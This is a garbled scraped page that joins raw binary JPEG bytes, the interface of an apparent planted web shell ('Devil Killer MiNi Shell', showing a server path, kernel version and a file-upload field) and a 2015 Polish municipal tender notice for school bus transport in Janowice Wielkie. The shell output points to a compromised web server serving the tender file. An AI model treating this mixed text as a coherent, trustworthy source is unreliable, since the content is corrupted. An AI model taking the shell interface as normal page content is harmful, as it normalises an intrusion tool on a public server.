JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150707/167618-N-2015.html

<p class="kh_header"><b>Janowice Wielkie: Zapewnienie przewozu uczniom uczęszczającym do Gminnego Zespołu Szkół w Janowicach Wielkich i wychowankom uczęszczającym do Przedszkola Publicznego w Janowicach Wielkich w okresie od 01.09.2015 r  do dnia 30.06.2016 r. poprzez zakup ulgowych biletów miesięcznych w dniach nauki wynikających z organizacji roku szkolnego</b><br>
<b>Numer ogłoszenia: 167618 - 2015; data zamieszczenia: 07.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Janowice Wielkie , ul. Kolejowa 2, 58-520 Janowice Wielkie, woj. dolnośląskie, tel. 075 7515124, faks 075 7515124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.janowicewielkie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zapewnienie przewozu uczniom uczęszczającym do Gminnego Zespołu Szkół w Janowicach Wielkich i wychowankom uczęszczającym do Przedszkola Publicznego w Janowicach Wielkich w okresie od 01.09.2015 r  do dnia 30.06.2016 r. poprzez zakup ulgowych biletów miesięcznych w dniach nauki wynikających z organizacji roku szkolnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zapewnienie przewozu uczniom uczęszczającym do Gminnego Zespołu Szkół w Janowicach Wielkich i wychowankom uczęszczającym do Przedszkola Publicznego w Janowicach Wielkich w okresie od 01.09.2015 r  do dnia 30.06.2016 r. poprzez zakup ulgowych biletów miesięcznych w dniach nauki wynikających z organizacji roku szkolnego.w dniach nauki wynikających z organizacji roku szkolnego.

Rodzaj zamówienia: usługi
Wspólny Słownik Zamówień (CPV):
60.11.20.00 - 6 - usługi w zakresie publicznego transportu drogowego
Pod pojęciem przewóz uczniów rozumie się dowóz uczniów z miejsca zatrzymania autobusu (przystanku) najbliższego miejscu zamieszkania do szkoły albo przedszkola i odwóz po skończonych zajęciach do miejsca zatrzymania autobusu (przystanku) najbliższego miejscu zamieszkania wraz z zapewnieniem warunków bezpieczeństwa i higieny w trakcie wsiadania i wysiadania oraz opieką opiekuna w każdym pojeździe w trakcie wsiadania, jazdy i wysiadania uczniów/wychowanków. Zamawiający wymaga, aby Wykonawca dysponował min. 2 autobusami albo 1 autobusem i 1 busem oraz autobusu awaryjnego dla przewozu dzieci szkolnych z terenu Gminy Janowice Wielkie, z liczbą miejsc odpowiadającą ilości przewożonych uczniów na poszczególnych trasach oraz 1 autobus awaryjny z liczbą miejsc odpowiadającą ilości przewożonych uczniów na danej trasie, przy czym zaleca się, aby pojazd obsługujący Mniszków miał mniejsze gabaryty (z uwagi na trudności w zawracaniu zimą), zapewniającymi dowóz wszystkich uczniów na poszczególnych trasach w wyznaczonych godzinach. Do liczby pojazdów wliczyć należy autobus Autosan Smyk przekazywany przez Gminę Janowice Wielkie w ramach umowy dzierżawy. Pojazd można oglądać po umówieniu się w Urzędzie Gminy, możliwe jest udostępnienie jego dokumentów technicznych na życzenie oferenta. Oferent z chwilą zawarcia umowy między nim a Gminą Janowice Wielkie przejmie wszystkie koszty napraw i utrzymania bieżącego autobusu Smyk będącego przedmiotem dzierżawy, a także koszty ubezpieczenia, materiałów eksploatacyjnych, przeglądów, ubezpieczenia pojazdu; pojazd nie będzie mógł być przedmiotem jakichkolwiek obciążeń dokonywanych przez dzierżawcę wobec osób trzecich. Z tytułu dzierżawy autobusu Smyk dzierżawca ponosić będzie miesięczną stałą opłatę dzierżawną, która będzie podlegać równoległemu potrąceniu z miesięczną opłatą za zamówione bilety miesięczne w terminie rozliczenia każdego miesiąca w okresie trwania umowy, a  za miesiące wakacyjne wraz rozliczeniem za wrzesień. Opłata  dzierżawy jest wkalkulowana przez Wykonawcę do ceny biletów wraz z innymi kosztami Wykonawcy.
Linie kursowe oraz godziny przejazdów poszczególnych autobusów, którymi zainteresowany jest Zamawiający zostały zawarte w załączniku nr 4 do SIWZ. Przed zawarciem umowy Wykonawca winien dostosować swój rozkład jazdy, będący załącznikiem do zezwolenia na wykonywanie regularnych przewozów osób w krajowym transporcie drogowym, do wymogów zamawiającego określonych w orientacyjnym rozkładzie jazdy. Jeżeli Wykonawca zamierza przedłożyć w postępowaniu inny rozkład jazdy niż wskazany przez Zamawiającego w Załączniku Nr 4 do SIWZ , ale zapewniający całkowity dowóz i odwóz dzieci ( określonych w SIWZ ) do szkół Gminy Janowice Wielkie z przystanków wskazanych w załączniku nr 4 do SIWZ zamawiający dopuszcza możliwość innych rozwiązań przebiegu tras dowozu i odwozu uczniów jedynie w przypadku rozwiązań bardziej praktycznych, efektywnych i korzystnych dla zamawiającego , jednakże przed złożeniem oferty musi uzyskać akceptację rozkładu jazdy na rok szkolny 2015/2016 przez Zamawiającego. Uczniowie powinni być dowiezieni do szkoły na minimum 5 minut przed rozpoczęciem zajęć lekcyjnych rozpoczynających się o godz. 8.00 i zabrani z przystanków nie wcześniej niż o godz. 7.00 (w uzasadnionych przypadkach mogących istotnie rzutować na cenę oferty dopuszcza się nieznaczne przesunięcie godziny na inną) a przedszkola na godz. 8 20 
Orientacyjna liczba uczniów dowożonych do szkoły lub przedszkola z poszczególnych miejscowości Gminy Janowice Wielkie przedstawia się następując ona rok 2015/2016 :
 z miejscowości Komarno (przystanki Kolonia, Średnie, Kościół, Pętla) na godz.8.00   49 dzieci 
 z miejscowości Radomierz (przystanki Radomierz 7 i Sklep spożywczy) na godz. 8.00 - 35 dzieci 
 z miejscowości Trzcińsko (przystanki: Krzyż, Kościół, Trzcińsko 41, Trzcińsko 26, Trzcińsko 11) na godz. 8.00 - 43 dzieci
 z miejscowości Miedzianka (przystanek Miedzianka 16) na godz. 8.00 - 5 dzieci
 z miejscowości Mniszków (przystanki: Mniszków 48, Mniszków 28, Mniszków 16, Mniszków 7) na godz. 8.00 - 11 dzieci
Łącznie - 143 dzieci . 
Orientacyjna liczba uczniów odwożonych oraz godziny odwozów dzieci ze szkoły lub przedszkola do poszczególnych miejscowości Gminy Janowice Wielkie przedstawia się następująco:
ze szkoły/przedszkola w Janowicach Wielkich wyjazd (-y) ok. godz. 12.40 ok. 70 dzieci
ze szkoły/przedszkola w Janowicach Wielkich wyjazd (-y) ok. godz. 14.55- ok. 64 dzieci Liczba odwożonych dzieci waha się zależnie od planu lekcji w danym dniu; nieliczne dzieci są odbierane przez rodziców. Zamawiający zastrzega sobie prawo korekty ilości  uczniów. Zamawiający zastrzega
sobie  prawo  zmian  w  zakresie liczby  dzieci  albo  zmian  osobowych  na liście  dzieci.  Zwiększenie  liczby
dzieci  dowożonych  do    szkoły      będzie powodowało  zmiany w umowie: zmianie ulegnie liczba zamawianych ulgowych biletów. 
Zamawiający wymaga, aby kursami były odwożone dzieci do wszystkich miejscowości. Szacunkowy wykaz ilościowy dowożonych uczniów wsiadających na poszczególnych przystankach do poszczególnych szkół przedstawia załącznik nr 7 do SIWZ. Przewóz uczniów odbywać się będzie na podstawie imiennych ulgowych biletów miesięcznych, zakupywanych przez Zamawiającego na podstawie list uczniów uprawnionych do przejazdów, sporządzanych co miesiąc przez Dyrektorów obu placówek oświatowych. Ilość zakupywanych biletów miesięcznych w okresie roku szkolnego może ulegać nieznacznej zmianie. W przypadku zwiększenia ilości dowożonych uczniów Wykonawca musi zapewnić ich dowóz na warunkach podanych w ofercie. Z tytułu zmniejszenia ilości dowożonych uczniów Zamawiający nie przewiduje ponoszenia dodatkowych opłat z tego tytułu. W przewozie będą brali udział opiekunowie - osoby, wykonujące usługę na podstawie odrębnej umowy z oferentem. Osoby te odpowiadają za porządek i bezpieczeństwo dzieci podczas przejazdu. Pojazdy służące do przewozu dzieci muszą być w pełni sprawne, spełniać wymogi bezpieczeństwa, muszą być odpowiednio oznakowane (zgodnie z obowiązującymi przepisami), wszyscy przewożeni uczniowie powinni mieć zapewnione miejsca siedzące, pojazdy maja być wyposażone w pasy bezpieczeństwa dla pasażerów. Pierwszeństwo w przewozie na liniach regularnych będą miały dzieci z wykupionymi przez Zamawiającego od Wykonawcy biletami miesięcznymi. W przypadku awarii środka transportu, Wykonawca ma obowiązek zapewnić pojazd zastępczy w ciągu 60 minut, bez ponoszenia jakichkolwiek kosztów ze strony Zamawiającego. Jeżeli Wykonawca nie wywiąże się z tego obowiązku, Zamawiający zorganizuje przewóz uczniów na koszt Wykonawcy a Wykonawca zobowiązany będzie do zwrotu kosztów przewozu zastępczego w terminie 5 dni od dostarczenia rachunku lub faktury za przewóz zastępczy. Wykonawca nie będzie ponosił odpowiedzialności za niewykonanie usługi jedynie w przypadku wystąpienia czynników zewnętrznych uniemożliwiających jej wykonanie, takich jak : brak przejezdności drogi, nadmierne opady atmosferyczne (deszcz nawalny), gołoledź, klęska żywiołowa, mróz -30 stopni C. Wykonawca zobowiązuje się do ubezpieczenia przewożonych dzieci i opiekuna (oraz innych pasażerów ) od następstw nieszczęśliwych wypadków w trakcie realizacji przedmiotu zamówienia. W przypadku uczniów korzystających z dowozu w jedną stronę - do szkoły lub ze szkoły do miejsca zamieszkania - Wykonawca wskazuje cenę biletu według swojej kalkulacji. Świadczona usługa będzie wykonywana zgodnie z umową stanowiącą załącznik nr 3 do SIWZ. Płatność za wykonaną usługę nastąpi do ostatniego dnia miesiąca objętego zamówieniem na bilety miesięczne w kwocie wynikającej z iloczynu liczby dzieci, dla których zamówiono bilet miesięczny i stawki za daną trasę. Oferent przedstawia Zamawiającemu cenę po uwzględnieniu uzyskania dofinansowania przez niego z odrębnych źródeł do stałego przewozu dzieci do placówek oswiatowych.
Ponadto Wykonawca zobowiązany jest do umieszczenia na każdym przystanku tabliczki z  rozkładem jazdy autobusów (godziny przyjazdu , godziny odjazdu) oraz informacją, że jest to przystanek dla dzieci dowożonych do szkoły. Wzór takiej tabliczki informacyjnej do uzgodnienia z Zamawiającym i po jego akceptacji.
WAŻNE- Zamawiający informuje, że tabor samochodowy którym będzie wykonywana  usługa nie może być straszy niż 10 lat.  W przypadku  jeżeli Wykonawca wykaże że posiada tabor samochodowy starszy niż   10lat Zamawiający uzna, że Wykonawca nie spełnia kryteriów udziału  w postępowaniu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. Licencję na wykonywanie krajowego transportu drogowego w zakresie przewozu osób autobusem, stosownie do postanowień ustawy z dnia 06 września 2001r. o transporcie drogowym ( Dz.U. z 2007r. nr 125, poz. 874 z późn. zmianami),
b. Zezwolenie lub wypis z zezwolenia na wykonywanie regularnych przewozów osób w krajowym transporcie drogowym wydanych na podstawie art. 18 ust. 1 pkt 1 , ustawy z dnia 06 września 2001r o transporcie drogowym ( Dz. U. z 2007 r., nr 125, poz. 874 z późn. zmianami ), w ramach linii regularnych obejmujące trasy (linie kursowe) określone według SIWZ - Zamawiający dopuszcza przedstawienie zgody na korzystanie z przystanków przy drogach powiatowych lub gminnych oraz zezwolenia na wykonywanie przewozu wystawianego przez Starostę (Zarząd Dróg Powiatowych) lub Wójta Gminy Janowice Wielkie w terminie późniejszym, jednak nie później niż przed podpisaniem umowy.według SIWZ.Zamawiający oceni spełnianie warunków udziału w postępowaniu na podstawie złożonych do oferty przez Wykonawcę oświadczeń lub dokumentów o których mowa w punkcie VI SIWZ. Ocena spełniania warunków będzie dokonywana na zasadzie: spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych ( a w przypadku świadczeń okresowych lub ciągłych również wykonywanych ) usług w okresie 3 lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane lub są wykonywane należycie -załącznik nr 5 do SIWZ.  Wykonawca musi wykazać, że w ciągu ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, że zrealizował lub realizuje ( w przypadku świadczeń okresowych lub ciągłych ) minimum jedną usługę obejmującą wykonanie
przewozów uczniów do szkół/przedszkoli. Wartość wykonanej usługi nie może być niższa niż
50.000,00 zł brutto.Zamawiający oceni spełnianie warunków udziału w postępowaniu na podstawie złożonych do oferty przez Wykonawcę oświadczeń lub dokumentów o których mowa w punkcie VI SIWZ. Ocena spełniania warunków będzie dokonywana na zasadzie: spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń jakimi dysponuje lub będzie dysponował Wykonawca; Wykonawca musi dysponować : min. 2 autobusami/busami dla przewozu dzieci szkolnych z terenu Gminy oraz 1 autobus awaryjny -załącznik nr 6 do SIWZ. 
WAŻNE- Zamawiający informuje, że tabor samochodowy którym będzie wykonywana  usługa nie może być straszy niż 10 lat.  W przypadku  jeżeli Wykonawca wykaże że posiada tabor samochodowy starszy niż   10lat Zamawiający uzna, że Wykonawca nie spełnia kryteriów udziału  w postępowaniu. 

Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.Zamawiający oceni spełnianie warunków udziału w postępowaniu na podstawie złożonych do oferty przez Wykonawcę oświadczeń lub dokumentów o których mowa w punkcie VI SIWZ. Ocena spełniania warunków będzie dokonywana na zasadzie: spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnianie warunków udziału w postępowaniu na podstawie złożonych do oferty przez Wykonawcę oświadczeń lub dokumentów o których mowa w punkcie VI SIWZ. Ocena spełniania warunków będzie dokonywana na zasadzie: spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłaconą polisę a w przypadku jej braku inny dokument potwierdzający, że wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.Zamawiający oceni spełnianie warunków udziału w postępowaniu na podstawie złożonych do oferty przez Wykonawcę oświadczeń lub dokumentów o których mowa w punkcie VI SIWZ. Ocena spełniania warunków będzie dokonywana na zasadzie: spełnia nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - cena wynajmu autobusu Autosan Smyk - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

